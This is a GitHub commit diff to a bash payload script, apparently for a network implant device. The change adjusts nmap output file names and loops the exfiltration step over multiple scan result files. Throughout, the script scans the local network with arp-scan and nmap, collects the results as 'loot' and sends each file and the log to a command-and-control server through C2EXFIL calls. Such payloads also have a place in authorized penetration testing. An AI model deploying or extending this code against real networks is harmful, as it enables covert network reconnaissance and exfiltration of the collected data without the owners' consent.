Added -oA option for interessting host scan again, exfil for multiple scan results (#50)
* move -oA option to standart nmap scan moving -oA option to generate files to the scan of the whole network, not just the interessting hosts. Since e.g. .xml files are more useful for discovery scans of a whole network. * fix fixed borken funktion * Update payload.sh * adding support for multiple nmaps with -oA option Re-added the -oA option for interessting hosts. With differing file name. Support for multiple nmap scans producing output files via -oA option.pull/51/head
Random is Resistance
GitHub
parent
245b54384d
commit
2b04952cb6
|
|
@ -426,7 +426,7 @@ function GRAB_NMAP_INTERESTING_HOSTS_LOOT() {
|
||||||
if [ "$GRAB_NMAP_INTERESTING_HOSTS_LOOT" = "true" ]; then
|
if [ "$GRAB_NMAP_INTERESTING_HOSTS_LOOT" = "true" ]; then
|
||||||
NMAP_INTERESTING_HOSTS_LOOT_FILE=$LOOT_DIR/nmap_interesting_hosts.txt
|
NMAP_INTERESTING_HOSTS_LOOT_FILE=$LOOT_DIR/nmap_interesting_hosts.txt
|
||||||
### Adding -oA nmap option to scan option
|
### Adding -oA nmap option to scan option
|
||||||
NMAP_OPTIONS_INTERESTING_HOSTS="${NMAP_OPTIONS_INTERESTING_HOSTS} -oA ${LOOT_DIR}/nmap-${SCAN_COUNT}-${TODAY}"
|
NMAP_OPTIONS_INTERESTING_HOSTS="${NMAP_OPTIONS_INTERESTING_HOSTS} -oA ${LOOT_DIR}/nmap-interesting-hosts-${SCAN_COUNT}-${TODAY}"
|
||||||
touch $NMAP_INTERESTING_HOSTS_LOOT_FILE
|
touch $NMAP_INTERESTING_HOSTS_LOOT_FILE
|
||||||
INTERESTING_HOSTS=( $(arp-scan --localnet | egrep $INTERESTING_HOSTS_PATTERN | awk {'print $1'} | awk '{print}' ORS='\t' | sed 's/.$//') )
|
INTERESTING_HOSTS=( $(arp-scan --localnet | egrep $INTERESTING_HOSTS_PATTERN | awk {'print $1'} | awk '{print}' ORS='\t' | sed 's/.$//') )
|
||||||
INTERESTING_HOSTS+=( $(ip r | grep default | cut -d ' ' -f 3) )
|
INTERESTING_HOSTS+=( $(ip r | grep default | cut -d ' ' -f 3) )
|
||||||
|
|
@ -440,7 +440,6 @@ function GRAB_NMAP_INTERESTING_HOSTS_LOOT() {
|
||||||
#nmap $NMAP_OPTIONS_INTERESTING_HOSTS ${INTERESTING_HOSTS[@]} -oN $NMAP_INTERESTING_HOSTS_LOOT_FILE && echo "Nmap scan ${#INTERESTING_HOSTS[@]} interesting host with nmap options: \"$NMAP_OPTIONS_INTERESTING_HOSTS\" executed succesfully" >> $LOG_FILE || echo "Nmap scan ${#INTERESTING_HOSTS[@]} interesting host with nmap options: \"$NMAP_OPTIONS_INTERESTING_HOSTS\" failed" >> $LOG_FILE
|
#nmap $NMAP_OPTIONS_INTERESTING_HOSTS ${INTERESTING_HOSTS[@]} -oN $NMAP_INTERESTING_HOSTS_LOOT_FILE && echo "Nmap scan ${#INTERESTING_HOSTS[@]} interesting host with nmap options: \"$NMAP_OPTIONS_INTERESTING_HOSTS\" executed succesfully" >> $LOG_FILE || echo "Nmap scan ${#INTERESTING_HOSTS[@]} interesting host with nmap options: \"$NMAP_OPTIONS_INTERESTING_HOSTS\" failed" >> $LOG_FILE
|
||||||
nmap $NMAP_OPTIONS_INTERESTING_HOSTS ${INTERESTING_HOSTS[@]} >> $NMAP_INTERESTING_HOSTS_LOOT_FILE && echo "Nmap scan ${#INTERESTING_HOSTS[@]} interesting host with nmap options: \"$NMAP_OPTIONS_INTERESTING_HOSTS\" executed succesfully" >> $LOG_FILE || echo "Nmap scan ${#INTERESTING_HOSTS[@]} interesting host with nmap options: \"$NMAP_OPTIONS_INTERESTING_HOSTS\" failed" >> $LOG_FILE
|
nmap $NMAP_OPTIONS_INTERESTING_HOSTS ${INTERESTING_HOSTS[@]} >> $NMAP_INTERESTING_HOSTS_LOOT_FILE && echo "Nmap scan ${#INTERESTING_HOSTS[@]} interesting host with nmap options: \"$NMAP_OPTIONS_INTERESTING_HOSTS\" executed succesfully" >> $LOG_FILE || echo "Nmap scan ${#INTERESTING_HOSTS[@]} interesting host with nmap options: \"$NMAP_OPTIONS_INTERESTING_HOSTS\" failed" >> $LOG_FILE
|
||||||
fi
|
fi
|
||||||
return
|
|
||||||
}
|
}
|
||||||
|
|
||||||
function GRAB_DIG_LOOT() {
|
function GRAB_DIG_LOOT() {
|
||||||
|
|
@ -483,37 +482,40 @@ function EXFIL_TO_CLOUD_C2() {
|
||||||
LOOT_FILE_DESC=${LOOT_FILE_DESC^^}
|
LOOT_FILE_DESC=${LOOT_FILE_DESC^^}
|
||||||
C2EXFIL STRING $LOOT_FILE $LOOT_FILE_DESC && echo "Exfiltration of $LOOT_FILE to Cloud C2 has passed" >> $LOG_FILE || echo "Exfiltration of $LOOT_FILE to Cloud C2 has failed" >> $LOG_FILE
|
C2EXFIL STRING $LOOT_FILE $LOOT_FILE_DESC && echo "Exfiltration of $LOOT_FILE to Cloud C2 has passed" >> $LOG_FILE || echo "Exfiltration of $LOOT_FILE to Cloud C2 has failed" >> $LOG_FILE
|
||||||
done
|
done
|
||||||
|
|
||||||
### Add exfiltration of nmap -oA files
|
### Add exfiltration of nmap -oA files
|
||||||
## XML
|
## XML
|
||||||
LOOT_FILES="$LOOT_DIR/*.xml"
|
LOOT_FILES="$LOOT_DIR/*.xml"
|
||||||
LOOT_FILE="${LOOT_FILES}" #just one file so no loop
|
for LOOT_FILE in $LOOT_FILES; do
|
||||||
LOOT_FILE_DESC=${LOOT_FILE/"$LOOT_DIR/"/}
|
LOOT_FILE_DESC=${LOOT_FILE/"$LOOT_DIR/"/}
|
||||||
LOOT_FILE_DESC=$SCAN_COUNT-$TODAY-${LOOT_FILE_DESC%.*}-loot
|
LOOT_FILE_DESC=$SCAN_COUNT-$TODAY-${LOOT_FILE_DESC%.*}-loot
|
||||||
LOOT_FILE_DESC=${LOOT_FILE_DESC^^}
|
LOOT_FILE_DESC=${LOOT_FILE_DESC^^}
|
||||||
C2EXFIL STRING $LOOT_FILE $LOOT_FILE_DESC && echo "Exfiltration of $LOOT_FILE to Cloud C2 has passed" >> $LOG_FILE || echo "Exfiltration of $LOOT_FILE to Cloud C2 has failed" >> $LOG_FILE
|
C2EXFIL STRING $LOOT_FILE $LOOT_FILE_DESC && echo "Exfiltration of $LOOT_FILE to Cloud C2 has passed" >> $LOG_FILE || echo "Exfiltration of $LOOT_FILE to Cloud C2 has failed" >> $LOG_FILE
|
||||||
|
done
|
||||||
|
|
||||||
## GNMAP
|
## GNMAP
|
||||||
LOOT_FILES="$LOOT_DIR/*.gnmap"
|
LOOT_FILES="$LOOT_DIR/*.gnmap"
|
||||||
LOOT_FILE="${LOOT_FILES}" #just one file so no loop
|
for LOOT_FILE in $LOOT_FILES; do
|
||||||
LOOT_FILE_DESC=${LOOT_FILE/"$LOOT_DIR/"/}
|
LOOT_FILE_DESC=${LOOT_FILE/"$LOOT_DIR/"/}
|
||||||
LOOT_FILE_DESC=$SCAN_COUNT-$TODAY-${LOOT_FILE_DESC%.*}-loot
|
LOOT_FILE_DESC=$SCAN_COUNT-$TODAY-${LOOT_FILE_DESC%.*}-loot
|
||||||
LOOT_FILE_DESC=${LOOT_FILE_DESC^^}
|
LOOT_FILE_DESC=${LOOT_FILE_DESC^^}
|
||||||
C2EXFIL STRING $LOOT_FILE $LOOT_FILE_DESC && echo "Exfiltration of $LOOT_FILE to Cloud C2 has passed" >> $LOG_FILE || echo "Exfiltration of $LOOT_FILE to Cloud C2 has failed" >> $LOG_FILE
|
C2EXFIL STRING $LOOT_FILE $LOOT_FILE_DESC && echo "Exfiltration of $LOOT_FILE to Cloud C2 has passed" >> $LOG_FILE || echo "Exfiltration of $LOOT_FILE to Cloud C2 has failed" >> $LOG_FILE
|
||||||
|
done
|
||||||
|
|
||||||
## NMAP
|
## NMAP
|
||||||
LOOT_FILES="$LOOT_DIR/*.nmap"
|
LOOT_FILES="$LOOT_DIR/*.nmap"
|
||||||
LOOT_FILE="${LOOT_FILES}" #just one file so no loop
|
for LOOT_FILE in $LOOT_FILES; do
|
||||||
LOOT_FILE_DESC=${LOOT_FILE/"$LOOT_DIR/"/}
|
LOOT_FILE_DESC=${LOOT_FILE/"$LOOT_DIR/"/}
|
||||||
LOOT_FILE_DESC=$SCAN_COUNT-$TODAY-${LOOT_FILE_DESC%.*}-loot
|
LOOT_FILE_DESC=$SCAN_COUNT-$TODAY-${LOOT_FILE_DESC%.*}-loot
|
||||||
LOOT_FILE_DESC=${LOOT_FILE_DESC^^}
|
LOOT_FILE_DESC=${LOOT_FILE_DESC^^}
|
||||||
C2EXFIL STRING $LOOT_FILE $LOOT_FILE_DESC && echo "Exfiltration of $LOOT_FILE to Cloud C2 has passed" >> $LOG_FILE || echo "Exfiltration of $LOOT_FILE to Cloud C2 has failed" >> $LOG_FILE
|
C2EXFIL STRING $LOOT_FILE $LOOT_FILE_DESC && echo "Exfiltration of $LOOT_FILE to Cloud C2 has passed" >> $LOG_FILE || echo "Exfiltration of $LOOT_FILE to Cloud C2 has failed" >> $LOG_FILE
|
||||||
|
done
|
||||||
|
|
||||||
### Exfiltrate log file
|
### Exfiltrate log file
|
||||||
LOG_FILE_DESC=$SCAN_COUNT-$TODAY-LOGFILE
|
LOG_FILE_DESC=$SCAN_COUNT-$TODAY-LOGFILE
|
||||||
C2EXFIL STRING $LOG_FILE $LOG_FILE_DESC && echo "Exfiltration of $LOG_FILE to Cloud C2 has passed" >> $LOG_FILE || echo "Exfiltration of $LOG_FILE to Cloud C2 has failed" >> $LOG_FILE
|
C2EXFIL STRING $LOG_FILE $LOG_FILE_DESC && echo "Exfiltration of $LOG_FILE to Cloud C2 has passed" >> $LOG_FILE || echo "Exfiltration of $LOG_FILE to Cloud C2 has failed" >> $LOG_FILE
|
||||||
else
|
else
|
||||||
echo "Exfiltration of $LOOT_FILE to Cloud C2 has failed, CC-CLIENT seems not to be running" >> $LOG_FILE
|
echo "Exfiltration of $LOOT_FILE to Cloud C2 has failed, CC-CLIENT seems not to be running" >> $LOG_FILE
|
||||||
|
|
||||||
fi
|
fi
|
||||||
fi
|
fi
|
||||||
return
|
return
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue